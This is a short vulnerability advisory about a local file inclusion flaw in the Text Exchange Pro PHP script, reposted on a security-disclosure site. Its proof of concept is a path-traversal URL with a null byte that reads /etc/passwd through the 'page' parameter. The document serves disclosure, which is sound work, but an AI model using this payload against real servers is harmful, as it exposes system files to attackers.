Text Exchange Pro Local File Inclusion

2012.08.25
Credit: Yakir Wizman
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-98

----------------------------------------------------------- Text Exchange Pro (index.php page) Local file inclusion Bug discovered by Yakir Wizman Date 24/08/2012 Vendor Homepage - http://www.phpwebscripts.com/text-exchange-pro/ Demo - http://www.scripts-demo.com/textexchangepro/ ISRAEL ----------------------------------------------------------- Author will be not responsible for any damage. ----------------------------------------------------------- About the Application ----------------------------------------------------------- Text Exchange Pro is an unique PHP script for running your own text link exchange system. Proof Of Conecpt ----------------------------------------------------------- Local file inclusion (Severity is high) Vulnerable URL : http://server/textexchangepro/index.php?page=../../../../../../../../../../etc/passwd%00

References:

http://www.scripts-demo.com/textexchangepro/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top